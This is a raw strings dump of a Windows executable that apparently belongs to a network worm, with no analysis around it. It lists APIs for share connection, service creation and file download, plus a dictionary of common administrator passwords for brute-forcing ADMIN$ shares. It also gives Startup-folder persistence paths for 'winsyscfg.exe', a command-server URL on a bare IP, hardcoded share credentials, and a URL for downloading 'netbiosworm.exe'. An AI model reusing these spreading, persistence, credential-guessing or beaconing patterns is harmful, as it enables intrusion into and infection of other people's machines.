!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
%d.%d.%d.%d
mbstowcs
MSVCR90.dll
_amsg_exit
__getmainargs
_cexit
_XcptFilter
_ismbblead
_acmdln
_initterm
_initterm_e
_configthreadlocale
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
_encode_pointer
__set_app_type
?terminate@@YAXXZ
_unlock
__dllonexit
_onexit
_decode_pointer
_except_handler4_common
_invoke_watson
_controlfp_s
_crt_debugger_hook
WNetAddConnection2W
WNetCancelConnectionW
MPR.dll
WS2_32.dll
InternetOpenW
InternetOpenUrlW
InternetReadFile
InternetCloseHandle
WININET.dll
PathFindFileNameW
SHLWAPI.dll
URLDownloadToFileW
urlmon.dll
ExitProcess
CreateProcessW
GetTickCount
WriteFile
CopyFileW
GetModuleFileNameW
CreateFileW
ExitThread
GetLastError
CreateMutexA
CloseHandle
DeleteFileW
CreateThread
ExpandEnvironmentStringsW
InterlockedExchange
InterlockedCompareExchange
GetStartupInfoA
SetUnhandledExceptionFilter
QueryPerformanceCounter
GetCurrentThreadId
GetCurrentProcessId
GetSystemTimeAsFileTime
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
IsDebuggerPresent
KERNEL32.dll
wsprintfW
wsprintfA
USER32.dll
CreateServiceW
CloseServiceHandle
OpenSCManagerW
StartServiceA
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
memset
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
<dependency>
<dependentAssembly>
<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
</dependentAssembly>
</dependency>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
V0c0s0y0
071G1Z1b1|1
3&3Q3^3k3v3
707>7K7P7
7b9l9t9
<&<:<Q<m<w<
=,=1=n=x=~=
>)>/>x>~>
>D?J?T?[?f?l?
0>0C0b0
11=1Q1W1
3"3(383>3D3T3Z3`3f3l3r3y3
44%4+4A4H4P4V4\4b4h4n4t4z4
8 8(8,8H8d8h8
0 0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
Administrator
administrator
Administrator
administrator
admin1
admin123
password
Password
password1
password12
password123
pass12
pass123
passwd
1234567890
123456789
12345678
1234567
123456
1q2w3e
1234abcd
1234qwer
a1b2c3
abc123
academia
access
account
anything
asddsa
asdfgh
asdzxc
backup
boss123
business
campus
changeme
cluster
codename
codeword
coffee
controller
cookie
customer
database
default
desktop
domain
example
exchange
explorer
foobar
foofoo
forever
freedom
home123
ihavenopass
Internet
intranet
killer
letitbe
letmein
love123
manager
market
monitor
mypass
mypassword
mypc123
nobody
nopass
nopassword
nothing
office
oracle
private
public
q1w2e3
qazwsx
qazwsxedc
qwe123
qweasd
qweasdzxc
qweewq
qwerty
root123
rootroot
sample
secret
secure
security
server
shadow
student
superuser
supervisor
system
temp123
temporary
temptemp
test123
testtest
unknown
windows
work123
zxccxz
zxcvbn
00000000
0000000
0987654321
11111111
1111111
111111
123123
123321
123abc
123asd
123qwe
22222222
2222222
222222
33333333
3333333
333333
44444444
4444444
444444
55555555
5555555
555555
654321
66666666
6666666
666666
7654321
77777777
7777777
777777
87654321
88888888
8888888
888888
987654321
99999999
9999999
999999
winsyscfg.exe
Windows\All Users\StartMenu\Programs\Startup\winsyscfg.exe
Windows\StartMenu\Programs\Startup\winsyscfg.exe
WINNT\Profiles\All Users\StartMenu\Programs\Startup\winsyscfg.exe
%userprofile%
ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\winsyscfg.exe
Users\All Users\Microsoft\Windows\Start Menu\Programs\winsyscfg.exe
Documents and Settings\All Users\StartMenu\Programs\Startup\winsyscfg.exe
http://185.215.113.66/admin.php?s=%s|%s|%s
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
%temp%
%s\%d%d.exe
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
%s:Zone.Identifier
%s\%d%d.exe
%s:Zone.Identifier
%s\24642664.jpg
\\%s\ADMIN$
%s\winsyscfg.exe
suckmadick
suckmadick
winsyscfg.exe
http://twizt.net/netbiosworm.exe
\\121.52.212.161\Admin$\winsyscfg.exe
suckmadick
suckmadick
\\121.52.212.161